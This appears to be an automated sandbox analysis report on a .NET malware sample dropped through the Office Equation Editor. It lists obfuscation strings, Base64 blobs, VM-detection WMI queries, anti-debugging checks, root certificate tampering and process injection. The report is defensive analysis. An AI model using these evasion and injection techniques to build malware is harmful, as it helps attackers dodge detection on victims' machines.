                      Source: 4.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 4.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.2.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.csBase64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 5.2.gudostrp.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                      Data Obfuscation:

                      barindex
                      Binary or sample is protected by dotNetProtectorShow sources
                      Source: gudostrp.exeString found in binary or memory: dotNetProtector
                      Source: gudostrp.exe, 00000004.00000002.462296022.00000000001D2000.00000020.00020000.sdmpString found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: gudostrp.exeString found in binary or memory: dotNetProtector
                      Source: gudostrp.exe, 00000005.00000002.721799916.00000000001D2000.00000020.00020000.sdmpString found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: gufoxqa[1].exe.2.drString found in binary or memory: dotNetProtector
                      Source: gufoxqa[1].exe.2.drString found in binary or memory: kIHasFieldMarshalReplaceInternalJoinInternalSet_IsLiteralAppCompatLiteralGet_IsInternalCalladvapi32.dllkernel32.dllKillEcmaPublicKeyFullSet_PercentSymbolChangeAccessControlBlobStreamInternalLoadFromStreamCryptoStreamMemoryStreamSystemSymmetricAlgorithmHashAlgorithmFormICryptoTransformGet_InGet_IsAddOnTanConvertHijriToGregorianStrLenget_MetadataTokenResolveTokenAssignCancellationTokenlpNumberOfBytesWrittenEndStrongNameSignBeginStrongNameSignSinAppDomainget_CurrentDomainGet_EndColumnGet_RevisionApplicationget_LocationOp_UnaryNegationNineRays.Obfuscator.EvaluationNoOptimizationSystem.ReflectionGetBaseDefinitionGenericParameterPositionCallingConventionRuntimeWrappedExceptionEncoderFallbackExceptionRunGetDynamicILInfoRslvMethodFieldInfoEhEndFinallyFieldInfoMethodInfo_compareInfoMemberInfoParameterInfoDelegateCtorInfoZeroGet_IsCharSetAutoAlignUpGetInterfaceMapInitializeEventMapGet_BlobHeapTablesHeapSleepSystem.Linqset_ShowInTaskbarGet_DefaultCalendarFirstGregorianTableYearMoveRightGetCharGet_CurrentCharGet_ParamNumberGet_ManagedNativeHeaderWriteTinyHeaderGetBlobReaderSyncTextReaderDESCryptoServiceProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderM_lastBlockBufferlpBufferResourceManagerDebuggerSet_IsOtherget_IsModifierWSTRBufferMarshalerAddOneArgTypeHelperCheckHelperCreateAttributeArrayHelperCreateProcessAsUserget_IsPointerBitConverterResolverModuleDirGetTokenForFloorSetLastErrorIEnumeratorInitializeTypeEnumeratorGetEnumerator.ctorLoadFactor.cctordotNetProtectorget_IsConstructorCreateDecryptorFromIntPtrBuildRevisionStr/
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_001DEB0F push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_001D67F6 pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030DE0D pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030DB73 push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA5275 push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB4FE7 push ebx; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB504D push ebp; retf
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB4FBE push ebx; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FBA412 pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FCB713 pushad ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_02035645 pushad ; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D561B push eax; retf
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D7CC7 push ebx; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D5901 pushad ; ret
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_001DEB0F push esp; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_001D67F6 pushfd ; iretd
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_002530B5 push esp; retf 0012h
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00251B15 push esp; retf 0012h
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0055626C pushfd ; retf 0018h
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\gudostrp.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 408Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2916Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096Thread sleep count: 9569 > 30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2096Thread sleep count: 171 > 30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exe TID: 2364Thread sleep count: 105 > 30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWindow / User API: threadDelayed 9569
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeThread delayed: delay time: 30000

                      Anti Debugging:

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)Show sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041DCAE8 CheckRemoteDebuggerPresent,
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory written: C:\Users\user\AppData\Roaming\gudostrp.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
